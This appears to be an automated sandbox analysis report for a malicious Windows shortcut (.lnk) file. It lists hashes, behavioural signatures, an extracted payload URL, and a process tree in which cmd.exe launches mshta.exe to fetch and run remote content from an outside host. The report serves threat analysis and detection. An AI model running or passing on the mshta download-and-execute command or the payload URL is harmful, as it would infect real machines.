Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10/04/2024, 11:03
Static task
static1
Behavioral task
behavioral1
Sample
5619bc25b41f378ded1f11598c87404d06e42a8e4616feeb1392036950817d41.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5619bc25b41f378ded1f11598c87404d06e42a8e4616feeb1392036950817d41.lnk
Resource
win10v2004-20240226-en
General
-
Target
5619bc25b41f378ded1f11598c87404d06e42a8e4616feeb1392036950817d41.lnk
-
Size
1KB
-
MD5
ea7acd3608fd3947a4627fa8f7bb3e13
-
SHA1
9ea546ce07d2e295f4361a16a5ff0d50100b6917
-
SHA256
5619bc25b41f378ded1f11598c87404d06e42a8e4616feeb1392036950817d41
-
SHA512
02b7504be393bc8d046d594039fd14d9cd85559956e69891271ae2b2e2c2e490ddd34556d3a5ee8ac8c3d6b1bc10db699fb2be01a86d9718e0d9185c980b4240
Malware Config
Extracted
http://a0717288.xsph.ru/intellectual/heap.mov
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2648 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2224 wrote to memory of 2648 2224 cmd.exe 29 PID 2224 wrote to memory of 2648 2224 cmd.exe 29 PID 2224 wrote to memory of 2648 2224 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\5619bc25b41f378ded1f11598c87404d06e42a8e4616feeb1392036950817d41.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://a0717288.xsph.ru/intellectual/heap.mov2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2648
-